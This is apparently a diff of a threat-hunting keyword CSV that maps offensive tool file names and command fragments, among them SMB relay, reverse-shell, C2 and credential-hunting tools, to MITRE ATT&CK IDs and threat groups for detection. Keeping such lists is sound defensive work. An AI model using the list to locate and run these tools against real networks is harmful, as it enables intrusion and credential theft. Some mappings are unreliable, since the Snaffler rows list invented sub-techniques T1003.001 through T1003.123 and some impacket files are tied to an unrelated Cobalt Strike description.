PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*smbrelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*smbrelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*SMBRelayResponse*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*smbrelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*SMBRelayResponse*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*smbrelayserver.*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*smbrelayserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*smbrelayx.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*smbrelayserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*smbrelayx.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*smb-reverse-shell.git*","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" "*smb-reverse-shell-main*","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" "*smbscan*","offensive_tool_keyword","smb-scanner","SMB Scanner tool","T1210.001 - T1190 - T1020 - T1213","TA0007 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/TechnicalMujeeb/smb-scanner","1","1","N/A","N/A","1","45","9","2018-03-30T10:25:18Z","2018-03-29T14:13:20Z" "*smb-scanner*","offensive_tool_keyword","smb-scanner","SMB Scanner tool","T1210.001 - T1190 - T1020 - T1213","TA0007 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/TechnicalMujeeb/smb-scanner","1","1","N/A","N/A","1","45","9","2018-03-30T10:25:18Z","2018-03-29T14:13:20Z" "*SmbScanner.exe*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","","N/A","","","" -"*smbserver.py -payload*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*smbserver.py -payload*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*smbserver.py -smb2support EXEGOL*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*smbserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*smbsigning_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*smbspider *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*smbspider.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*smbserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*smbsigning_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*smbspider *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*smbspider.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*smbsr.py*","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","2","138","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*smicallef/spiderfoot*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*SMShell.sln*","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","1","N/A","10","10","272","20","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" "*smtprelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*smtprelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*smtprelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*smtp-user-enum * -M EXPN *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*smtp-user-enum * -M RCPT *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*smtp-user-enum * -M VRFY *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*smtp-user-enum*","offensive_tool_keyword","smtp-user-enum","Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN - VRFY or RCPT TO.","T1133 - T1110.001","TA0007 - TA0006","N/A","N/A","Credential Access","https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*SnaffCon/Snaffler*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*SnaffCore.csproj*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*SnaffCore/ActiveDirectory*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - 